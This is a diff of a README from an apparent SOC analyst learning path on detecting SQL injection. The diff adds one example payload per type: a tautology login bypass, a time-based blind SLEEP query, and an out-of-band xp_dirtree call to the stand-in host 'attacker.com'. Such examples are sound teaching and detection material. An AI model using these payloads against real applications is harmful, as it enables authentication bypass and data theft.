ZuanAce/SOC-Analyst-Learning-Path/Detecting Web Attacks/SQL /README.md

 ## Types of SQL Injections
 There are 3 types of SQL Injection.
 These are:
 - In-band SQLi (Classic SQLi): When an SQL query is sent and responded to on the same channel, we call this in-band SQLi.
-This is easier for attackers to exploit than other categories of SQLi.
+This is easier for attackers to exploit than other categories of SQLi. `SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1';`
 - Inferential SQLi (Blind SQLi): SQL queries that receive a response that cannot be seen are called Inferential SQLi.
-They are also called "Blind SQLi" because the response cannot be seen.
+They are also called "Blind SQLi" because the response cannot be seen. `SELECT * FROM users WHERE id = 1; IF(1=1, SLEEP(5), 0) --;`
 - Out-of-band SQLi: If the response to an SQL query is communicated through another channel, this type of SQLi is called "out-of-band SQLi".
-For example, if the attacker receives replies to the SQL queries via DNS, this is called out-of-band SQLi.
+For example, if the attacker receives replies to the SQL queries via DNS, this is called out-of-band SQLi. `SELECT * FROM users WHERE id = 1; EXEC xp_dirtree '//attacker.com/abc' --;`

 ## How Does SQL Injection Work?
 Today, most standard web applications receive data from a user and use that data to display specific content.
 The login page is where most SQL injection attacks occur.
 Let's look at how SQL injections work through an example.